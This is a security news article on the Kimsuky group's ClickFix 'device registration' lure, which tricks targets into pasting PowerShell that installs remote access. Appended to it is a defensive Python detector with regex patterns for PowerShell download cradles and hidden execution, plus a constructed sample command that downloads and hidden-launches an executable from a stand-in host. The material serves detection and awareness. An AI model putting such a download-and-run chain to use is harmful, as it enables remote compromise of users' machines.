North Korean hackers spotted using ClickFix tactic to deliver malware

North Korean state-sponsored group Kimsuky (aka Emerald Sleet, aka VELVET CHOLLIMA) is attempting to deliver malware to South Korean targets by leveraging the so-called “ClickFix” tactic.

A relatively new tactic

The ClickFix social engineering tactic has been dubbed thus because of the initial pretext used by malware peddlers: the users, wanting to read a webpage or document or join a video call, are shown a fake browser notice saying that the page or doc cannot be displayed correctly or the microphone cannot work as it should until they click the “Fix It” button and follow the outlined steps.

Unfortunately, the outlined steps lead them to (usually) copy, paste, and run a malicious PowerShell script that downloads and runs malware without the web browser getting involved and without the user having to manually execute the file.

Variants of the tactic involve users having to perform the steps to solve fake human verification challenges or to install a needed security update.

Since the middle of 2024, the tactic has been used to deliver a variety of infostealers and dropper malware in targeted and “spray and pray” campaigns, mostly to Windows users but occasionally to Linux and macOS users, as well.

The ClickRegister variant

In this latest attack spotted by Microsoft’s threat analysts, the North Korean hackers initiate communications with the targets, build a rapport with them, and then send a spear-phishing email with a PDF attachment.

To view it, recipients are directed to a URL that provides instructions to register their device. This registration process entails opening PowerShell as an administrator and pasting code supplied by the threat actors:

The instructions (Source: Microsoft)

“Upon execution, the code installs a browser-based remote desktop tool and retrieves a certificate file with a hardcoded PIN from a remote server. The compromised system then communicates with the server to register the device using the downloaded certificate and PIN, enabling the attackers to access the device and exfiltrate data,” the analysts explained.

“Although this tactic has been observed in limited attacks since January 2025, it signifies a strategic shift in Emerald Sleet’s operations. Traditionally, the group has targeted individuals involved in international affairs, particularly those focusing on Northeast Asia, as well as NGOs, government agencies, and media outlets across North America, South America, Europe, and East Asia.”

While users should definitely be careful about what they are installing on their own devices, the ClickFix tactic and its variants rely on users being tech-unsavvy and vulnerable to a good pretext.

Security awareness and anti-phishing training can only do so much. Organizations should lock down employees’ systems as much as possible and employ attack surface reduction rules to prevent common attack techniques.
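As an added illustration (not code from the article or from Microsoft’s report), here is a defender-side triage heuristic that runs over the text of PowerShell ScriptBlock log events and flags the paste-and-run chain described above: a download, a launch of the fetched binary, a hidden window, and retrieval of a certificate or PIN. The two script blocks are constructed samples, and the indicator list and threshold are assumptions to be tuned per environment.

```python
"""Triage PowerShell ScriptBlock text (Event ID 4104) for ClickFix-style chains.

Added example; indicators and threshold are assumptions, sample blocks are constructed.
"""
import re

# Each indicator alone is common in legitimate admin scripts; a pasted ClickFix
# chain tends to combine several of them in one short script block.
INDICATORS = [
    ("download_cradle", r"(?i)\b(Invoke-WebRequest|iwr|Invoke-RestMethod|irm|curl|wget)\b|DownloadString|DownloadFile"),
    ("remote_execute", r"(?i)\b(iex|Invoke-Expression)\b"),
    ("launch_binary", r"(?i)\bStart-Process\b|\.(exe|msi)\b"),
    ("hidden_window", r"(?i)-w(indowstyle)?\s+hidden"),
    ("encoded_command", r"(?i)-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"),
    ("cert_or_pin_fetch", r"(?i)\.(cer|pfx|p12)\b|\bpin\b"),
]


def score_script_block(text):
    """Return the names of all indicators present in one script block."""
    return [name for name, pattern in INDICATORS if re.search(pattern, text)]


def is_clickfix_like(text, threshold=3):
    """Flag a block when at least `threshold` distinct indicators co-occur."""
    return len(score_script_block(text)) >= threshold


def triage(events, threshold=3):
    """Return (index, indicator names) for every flagged event in a batch."""
    flagged = []
    for i, text in enumerate(events):
        hits = score_script_block(text)
        if len(hits) >= threshold:
            flagged.append((i, hits))
    return flagged


# Constructed sample resembling a pasted "device registration" chain.
CLICKFIX_SAMPLE = (
    "$u='https://example.invalid/register/agent.exe'; "
    "Invoke-WebRequest -Uri $u -OutFile $env:TEMP\\agent.exe; "
    "Invoke-WebRequest -Uri 'https://example.invalid/register/device.pfx' -OutFile $env:TEMP\\device.pfx; "
    "Start-Process -WindowStyle Hidden $env:TEMP\\agent.exe -ArgumentList '--pin 1234'"
)
# Constructed benign admin one-liner for comparison.
BENIGN_SAMPLE = "Get-ChildItem -Path C:\\Logs -Filter *.log | Where-Object { $_.Length -gt 1MB } | Select-Object Name, Length"

if __name__ == "__main__":
    for idx, hits in triage([BENIGN_SAMPLE, CLICKFIX_SAMPLE]):
        print(f"event {idx} flagged: {', '.join(hits)}")
```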


About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.